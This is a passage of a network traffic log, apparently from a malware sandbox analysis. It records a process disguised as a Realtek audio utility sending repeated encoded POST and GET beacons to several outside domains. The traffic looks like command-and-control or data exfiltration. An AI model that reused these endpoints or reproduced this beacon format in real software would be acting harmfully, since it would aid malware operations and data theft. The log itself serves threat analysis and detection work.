                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 44 71 4f 73 54 55 66 46 65 6a 79 37 35 43 77 54 35 41 39 45 73 5a 7a 53 70 32 59 68 49 71 6b 70 43 55 75 4c 76 33 65 2b 7a 61 6b 72 30 39 67 4f 34 35 49 72 4e 62 6c 48 6b 78 66 31 75 77 56 61 73 4c 45 58 52 49 4b 66 42 64 76 4b 59 63 72 47 37 7a 49 39 6d 44 55 49 76 4f 30 71 48 74 4c 38 45 6b 43 5a 56 77 4c 76 4f 4c 4c 2b 67 4f 50 51 37 44 6f 30 33 34 31 2b 6f 53 31 7a 31 78 6d 4d 75 57 47 42 77 4b 78 58 48 72 42 41 44 6f 65 50 6f 39 57 38 58 75 38 52 71 4d 57 38 71 2b 6b 69 51 36 74 45 4b 62 36 65 41 75 4f 71 6d 4c 42 72 6e 63 57 42 4e 41 3d 3d
                                                                          Data Ascii: lV=TW4HYQMdIKn0DqOsTUfFejy75CwT5A9EsZzSp2YhIqkpCUuLv3e+zakr09gO45IrNblHkxf1uwVasLEXRIKfBdvKYcrG7zI9mDUIvO0qHtL8EkCZVwLvOLL+gOPQ7Do0341+oS1z1xmMuWGBwKxXHrBADoePo9W8Xu8RqMW8q+kiQ6tEKb6eAuOqmLBrncWBNA==
                                                                          Jan 9, 2025 16:48:35.800178051 CET137INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:48:35 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.11.204975947.83.1.90807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:37.664752007 CET812OUTPOST /nkmx/ HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.givvjn.info
                                                                          Referer: http://www.givvjn.info/nkmx/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 51 70 43 78 53 4c 75 31 32 2b 32 61 6b 72 38 64 67 50 6c 70 49 77 4e 62 59 6b 6b 31 58 31 75 77 78 61 73 4b 30 58 52 2f 2b 59 48 4e 76 49 55 38 72 45 2f 7a 49 39 6d 44 55 49 76 50 51 41 48 74 44 38 44 55 79 5a 58 53 7a 73 52 37 4c 68 6a 4f 50 51 74 7a 6f 77 33 34 31 63 6f 58 73 57 31 7a 4f 4d 75 54 69 42 78 59 4a 49 4f 72 42 4b 4d 49 66 4c 6b 34 7a 70 62 4e 77 6c 71 71 61 59 72 73 59 49 63 4d 67 65 58 70 4f 36 44 39 53 59 69 37 34 44 6c 65 58 61 51 45 59 64 46 41 48 36 4d 63 6a 38 68 46 52 67 4c 4c 46 4e 32 68 55 3d
                                                                          Data Ascii: lV=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYQpCxSLu12+2akr8dgPlpIwNbYkk1X1uwxasK0XR/+YHNvIU8rE/zI9mDUIvPQAHtD8DUyZXSzsR7LhjOPQtzow341coXsW1zOMuTiBxYJIOrBKMIfLk4zpbNwlqqaYrsYIcMgeXpO6D9SYi74DleXaQEYdFAH6Mcj8hFRgLLFN2hU=
                                                                          Jan 9, 2025 16:48:38.696535110 CET137INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:48:38 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.11.204976047.83.1.90807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:40.502289057 CET2578OUTPOST /nkmx/ HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.givvjn.info
                                                                          Referer: http://www.givvjn.info/nkmx/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 49 70 43 44 4b 4c 76 55 32 2b 78 61 6b 72 39 64 67 53 6c 70 4a 79 4e 62 41 34 6b 31 54 4c 75 79 5a 61 6a 49 38 58 42 4f 2b 59 4f 4e 76 49 63 63 72 42 37 7a 49 6f 6d 44 45 4d 76 4f 67 41 48 74 44 38 44 58 71 5a 54 41 4c 73 4b 37 4c 2b 67 4f 50 6d 37 44 6f 59 33 38 67 72 6f 58 59 73 31 43 75 4d 75 7a 53 42 7a 72 78 49 4d 4c 42 4d 46 59 66 74 6b 34 32 35 62 4e 73 44 71 76 4f 69 72 72 6b 49 4e 61 42 71 48 39 48 73 57 65 36 62 2f 34 73 37 7a 74 33 79 4e 47 68 6a 55 53 58 42 54 36 66 4c 75 48 56 33 62 4f 70 61 76 68 30 68 53 55 63 39 4c 4e 51 59 42 62 46 58 4b 4f 65 5a 64 46 32 48 76 73 5a 78 67 44 76 4e 62 2b 4e 41 55 33 4e 64 51 38 30 55 49 63 6c 37 4f 73 72 73 73 74 5a 49 5a 62 6f 51 6b 37 68 52 51 46 66 71 37 31 53 47 4f 34 74 52 47 70 59 72 34 41 41 76 4a 59 42 37 6b 45 4c 74 4c 52 66 38 73 63 2f 58 4b 7a 50 4a 67 55 32 63 52 43 49 30 48 6c 56 6c 64 6f 4b 59 76 4a 43 [TRUNCATED]
                                                                          Data Ascii: lV=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYIpCDKLvU2+xakr9dgSlpJyNbA4k1TLuyZajI8XBO+YONvIccrB7zIomDEMvOgAHtD8DXqZTALsK7L+gOPm7DoY38groXYs1CuMuzSBzrxIMLBMFYftk425bNsDqvOirrkINaBqH9HsWe6b/4s7zt3yNGhjUSXBT6fLuHV3bOpavh0hSUc9LNQYBbFXKOeZdF2HvsZxgDvNb+NAU3NdQ80UIcl7OsrsstZIZboQk7hRQFfq71SGO4tRGpYr4AAvJYB7kELtLRf8sc/XKzPJgU2cRCI0HlVldoKYvJCtlS7eWmt6rdghCkHY8hWAO4inU3/up73InoWYO1ZzU+wqvmDpkbQoRPPgKKzA/R2QqpCgxC8k6PWIr6GaZjmEjPhwRWlJt5JuoCrKcEpG6E1S4QxFCJvR9eYcvksT2G9m0zhhbkeYwm4faEMMMWchO1RKXRaGVfFomGfn6KgdUHFnQ3fnT+ZXl3JGwacKEQpzerZp+HrTvTz/U5qWVZA2LzbaUR8gHzeQnEWY430fZ0x+s1TirXALCgy2udthlheVtPTzz7z1lezsxt6UZsXlbQVTNJ5Q+B2eh3Jhi/rgCJVOE4slw9vew3dB/ZHtZn/7z+p1hdSn0oCJ4bMgDqh3Bzz2GWSQaYfducim0oFunMSBJs3IDRwYtUQTSmLmsR+C73u4trTk9BMwkdoW6J0A2PdOHT5q6qYHW5YJQ1p0FsQ2jVNNmaTNdIjVECmxlrwBqER1dS+tGtaqSXWeSu6UEP0VEvcVYt9oJWoDJQieVA24aiehWmTjRW/bVvZsjAzLWT3mI3U4Gimd2yINu82cVe45mqtIUBTDRGugBbJTR11wYsdI1YTWNnqLa5VI4QC+c3UCeyzy19RfDTl3Ooix/Ls5WI7J/+8r0z3o+Hmaa/s7hgUQpiZ2uH9ZPd6P9DVz/A8eovQ0AE4e63FNkxtIc+qXaDDe7j8r+ [TRUNCATED]
                                                                          Jan 9, 2025 16:48:40.502326012 CET5383OUTData Raw: 78 31 43 43 35 43 4c 59 30 53 66 4b 75 38 6f 49 72 6e 6d 35 32 36 59 70 4f 58 43 44 32 36 36 59 33 31 4d 35 70 51 42 4e 79 4c 77 50 6e 56 5a 61 68 56 4b 35 6e 65 4a 73 63 77 47 4b 54 50 61 6b 61 4a 35 41 65 54 6a 64 67 4a 49 57 64 45 56 32 33 52
                                                                          Data Ascii: x1CC5CLY0SfKu8oIrnm526YpOXCD266Y31M5pQBNyLwPnVZahVK5neJscwGKTPakaJ5AeTjdgJIWdEV23RLIDCVcroa9Ny/AEEt42oOcxCZuEZo4aX0BNRSHBByKWCDNZLG0CaxFBXO1FfpYjyV7gJBssljeqMgirhxwwvWLyQORtnarNab21QtoDfj2V0oYqFGBY0Baiw7KtowndhyNXrFs3RIonc4I+x7556bZQ3AvTCtcpgu
                                                                          Jan 9, 2025 16:48:41.498956919 CET137INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:48:41 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.11.204976147.83.1.90807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:43.342102051 CET529OUTGET /nkmx/?lV=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:48:44.345208883 CET139INHTTP/1.1 567 unknown
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:48:44 GMT
                                                                          Content-Length: 17
                                                                          Connection: close
                                                                          Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                          Data Ascii: Request too large


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.11.204976276.223.54.146807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:49.659240007 CET795OUTPOST /t3iv/ HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bonheur.tech
                                                                          Referer: http://www.bonheur.tech/t3iv/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 43 33 66 61 59 6b 55 63 35 72 38 55 32 2b 44 57 51 41 42 74 51 2b 53 4c 35 56 7a 64 57 41 53 43 33 4a 36 67 50 47 48 4d 75 41 41 33 4a 68 2b 58 4f 30 36 52 4d 36 32 71 56 51 4b 2b 74 54 51 38 52 33 62 38 4e 76 77 43 33 7a 51 64 34 51 55 38 73 54 2b 66 78 2f 33 6c 35 2f 42 55 30 6d 41 78 32 56 70 4e 33 52 67 72 74 57 7a 4e 6b 44 45 4a 44 46 4d 74 7a 64 6e 30 63 6f 67 68 6c 73 4b 6d 66 6a 35 6a 67 4a 4a 67 67 4f 73 54 6b 48 44 47 79 41 51 4c 54 6b 75 39 38 31 43 66 65 74 45 50 75 4b 71 6c 49 49 70 66 70 4e 78 79 73 35 57 2b 6b 55 78 57 39 43 4d 31 4f 46 58 67 30 4e 2b 33 48 77 3d 3d
                                                                          Data Ascii: lV=C3faYkUc5r8U2+DWQABtQ+SL5VzdWASC3J6gPGHMuAA3Jh+XO06RM62qVQK+tTQ8R3b8NvwC3zQd4QU8sT+fx/3l5/BU0mAx2VpN3RgrtWzNkDEJDFMtzdn0coghlsKmfj5jgJJggOsTkHDGyAQLTku981CfetEPuKqlIIpfpNxys5W+kUxW9CM1OFXg0N+3Hw==
                                                                          Jan 9, 2025 16:48:49.795423031 CET73INHTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.11.204976376.223.54.146807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:52.318074942 CET815OUTPOST /t3iv/ HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bonheur.tech
                                                                          Referer: http://www.bonheur.tech/t3iv/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 31 51 33 4a 46 36 58 63 42 61 52 4c 36 32 71 65 77 4b 37 69 7a 51 4e 52 33 58 72 4e 74 30 43 33 33 34 64 34 51 45 38 73 67 58 74 77 76 33 6e 67 50 42 53 37 47 41 78 32 56 70 4e 33 58 4e 4f 74 57 37 4e 6c 77 4d 4a 44 6b 4d 75 79 64 6e 31 66 6f 67 68 30 38 4b 69 66 6a 35 52 67 49 56 4f 67 4e 55 54 6b 47 7a 47 79 52 52 35 49 55 76 34 32 56 44 39 61 4f 35 41 6e 36 53 53 46 59 64 48 68 74 78 51 67 50 62 6b 35 6d 46 79 2b 52 51 48 4b 31 75 49 32 50 2f 73 61 2b 52 66 45 46 4a 71 46 68 55 62 51 6b 58 78 4f 76 37 61 38 64 45 3d
                                                                          Data Ascii: lV=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct1Q3JF6XcBaRL62qewK7izQNR3XrNt0C334d4QE8sgXtwv3ngPBS7GAx2VpN3XNOtW7NlwMJDkMuydn1fogh08Kifj5RgIVOgNUTkGzGyRR5IUv42VD9aO5An6SSFYdHhtxQgPbk5mFy+RQHK1uI2P/sa+RfEFJqFhUbQkXxOv7a8dE=
                                                                          Jan 9, 2025 16:48:52.453670979 CET73INHTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.11.204976476.223.54.146807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:54.994981050 CET2578OUTPOST /t3iv/ HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bonheur.tech
                                                                          Referer: http://www.bonheur.tech/t3iv/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 32 77 33 4b 77 75 58 4f 51 61 52 4b 36 32 71 43 67 4b 36 69 7a 51 51 52 33 50 6e 4e 74 35 33 33 78 38 64 2b 44 38 38 71 56 72 74 6c 2f 33 6e 6f 76 42 58 30 6d 41 6b 32 56 35 4a 33 58 39 4f 74 57 37 4e 6c 78 63 4a 58 6c 4d 75 2f 39 6e 30 63 6f 67 39 6c 73 4c 46 66 6a 77 6d 67 49 42 77 6a 39 30 54 6b 6d 6a 47 31 6a 35 35 45 55 76 32 31 56 44 62 61 4f 30 41 6e 37 2b 34 46 59 70 35 68 73 35 51 77 4a 44 37 6a 33 70 37 72 48 51 4a 41 55 32 78 36 4e 33 43 45 4d 68 77 46 6d 70 36 4b 30 41 66 54 79 58 59 61 50 62 6a 68 61 7a 7a 7a 36 36 66 32 4a 6a 67 52 6a 61 49 35 70 55 51 65 65 79 34 31 71 53 5a 62 65 79 64 4a 6c 64 53 6c 37 73 74 50 38 62 51 6e 77 69 30 54 35 4f 52 67 6d 6f 71 42 52 49 45 6d 77 4b 72 32 73 6f 52 70 76 6f 52 43 41 64 32 4f 61 78 6b 4c 55 6b 2f 5a 6b 64 6d 6a 55 4e 4c 79 65 58 55 76 53 4f 33 49 2b 42 32 69 71 4e 34 6a 48 71 37 74 59 35 61 4a 55 43 69 69 6b 6e [TRUNCATED]
                                                                          Data Ascii: lV=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct2w3KwuXOQaRK62qCgK6izQQR3PnNt533x8d+D88qVrtl/3novBX0mAk2V5J3X9OtW7NlxcJXlMu/9n0cog9lsLFfjwmgIBwj90TkmjG1j55EUv21VDbaO0An7+4FYp5hs5QwJD7j3p7rHQJAU2x6N3CEMhwFmp6K0AfTyXYaPbjhazzz66f2JjgRjaI5pUQeey41qSZbeydJldSl7stP8bQnwi0T5ORgmoqBRIEmwKr2soRpvoRCAd2OaxkLUk/ZkdmjUNLyeXUvSO3I+B2iqN4jHq7tY5aJUCiiknmREZA9cZcJkDO2+6oD/LVa2d15kffj9dR6J5GJ07aWok6vBILgh79bpV52H+cR+RE+UczrNL+4F0/w+f4EeShNuSZAyM/94xHEvT1ze5ORCDvmft4wdGDmNiNBkcMbEqG8uyxdDWD49kiEFlR5Lrtao8BOfU0vPvkKhgVPJ6AgcIfM3hrlry9drRguaUok91QHWpywFR0fc9fUUK+LR5nrYHYRNsWpred7L7Kw8aw9VCan1w0kDZrppLXc9PKNe4z6E6QsbfA3orN/rzanbrZVtD3A46lioLf6j0hXFupgIe0UmmQBc+S8qMPedqF7Jodn+xK4UqThoSK+SEtY8umi+qmd5qNuB/mntP3zCGbNBtQfyXupVJCwsPzpLPToP2Hw6oCvhqhS5vCntXxHrwJkYMkKusSCoVzWHSm3VuqJeWGAQbAFLr7ASGlEA940EcKSKqMhARluC4d6MA4QwVGg722mHYfLDXQ7Ib5Vk/XZJrfCeJKJKK8iGxKX1nUtjgaA4hK0V+PHmn1P6H7rzG77xV6g2Q7OjIiIWCM3q1d22eIUVXXFtz8NhIAT4O5qVgW88go0uqbXlqak0PrLNo7VUC3Rmeyzcvu50RVcANF3Yz7+MEbYmGmGmfxM3xkT2aF+IELIP4osdI/4xP7xrpMQFk21H7YSWc1D [TRUNCATED]
                                                                          Jan 9, 2025 16:48:54.995001078 CET5386OUTData Raw: 4f 73 69 79 32 2b 71 71 48 2b 59 6e 35 45 43 77 4c 4d 45 6a 2b 45 77 66 42 6e 44 33 79 63 31 69 74 44 2b 63 6d 4f 6d 77 53 66 77 77 55 54 55 2b 53 65 50 39 42 37 75 76 52 36 71 4a 6a 42 4b 4c 38 4a 58 68 62 6f 54 72 4d 37 43 45 2f 57 4c 4b 58 46
                                                                          Data Ascii: Osiy2+qqH+Yn5ECwLMEj+EwfBnD3yc1itD+cmOmwSfwwUTU+SeP9B7uvR6qJjBKL8JXhboTrM7CE/WLKXFxN1oxq4x3145yC29QWGt71TcHLBFXfLGEyHDrmAvmy94dJihsZnOJD8pg3/9TwDSXm6MTgSvKK4b7VwJ39ltDPo1H11NEKBhGIpkZCtGZ9o84PEhrDpChE3wpt7tKu42LIwVCRUKm4581LQFFYj6X3Ugs2BFmaqFN
                                                                          Jan 9, 2025 16:48:55.133171082 CET73INHTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.11.204976576.223.54.146807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:57.663496971 CET530OUTGET /t3iv/?lV=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:48:57.803649902 CET374INHTTP/1.1 200 OK
                                                                          content-type: text/html
                                                                          date: Thu, 09 Jan 2025 15:48:57 GMT
                                                                          content-length: 253
                                                                          connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6c 56 3d 50 31 33 36 62 53 59 77 2f 62 6f 69 6e 36 75 74 45 42 5a 37 50 4c 43 36 38 32 44 59 47 51 48 6b 39 71 4b 4c 65 54 6d 58 72 57 41 65 50 79 61 48 54 53 44 4d 46 6f 61 75 42 54 57 78 30 69 67 31 53 33 43 56 46 73 78 33 30 69 55 74 6a 52 56 51 69 42 79 35 35 49 33 59 70 39 39 47 68 33 6b 6b 38 48 35 48 32 41 45 4d 71 6b 57 42 36 67 6b 69 53 48 41 44 77 50 63 3d 26 4c 53 62 61 54 3d 7a 66 74 34 4c 6f 42 77 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lV=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=&LSbaT=zft4LoBw"}</script></head></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.11.2049766160.25.166.123807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:49:05.620799065 CET783OUTPOST /bwjl/ HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.rpa.asia
                                                                          Referer: http://www.rpa.asia/bwjl/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 78 7a 39 6d 75 4f 35 64 48 50 31 76 52 6e 35 43 38 56 44 71 6a 50 65 4b 42 58 6e 66 38 50 4a 78 2b 34 2f 75 68 69 7a 41 35 62 35 36 52 46 57 4d 6e 71 52 37 6b 69 6c 32 34 4d 4a 53 32 63 78 4d 30 55 44 4e 32 67 74 66 6a 68 74 57 56 6f 35 4a 61 48 50 5a 63 31 4b 7a 6f 77 78 4e 41 46 73 53 4c 4d 48 33 5a 51 58 78 68 4a 54 51 49 52 48 72 2f 30 37 6a 42 39 72 68 31 6c 36 52 67 70 66 43 6b 2f 45 75 6d 66 72 7a 75 72 48 30 36 47 4a 6b 48 30 39 44 58 75 62 6b 36 58 4a 65 47 56 2b 42 72 76 70 41 67 33 4b 53 53 6f 38 33 67 6e 37 37 4a 63 61 31 7a 41 3d 3d
                                                                          Data Ascii: lV=On/0Uk0gKlcgxz9muO5dHP1vRn5C8VDqjPeKBXnf8PJx+4/uhizA5b56RFWMnqR7kil24MJS2cxM0UDN2gtfjhtWVo5JaHPZc1KzowxNAFsSLMH3ZQXxhJTQIRHr/07jB9rh1l6RgpfCk/EumfrzurH06GJkH09DXubk6XJeGV+BrvpAg3KSSo83gn77Jca1zA==
                                                                          Jan 9, 2025 16:49:05.970071077 CET1289INHTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:49:05 GMT
                                                                          server: LiteSpeed
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
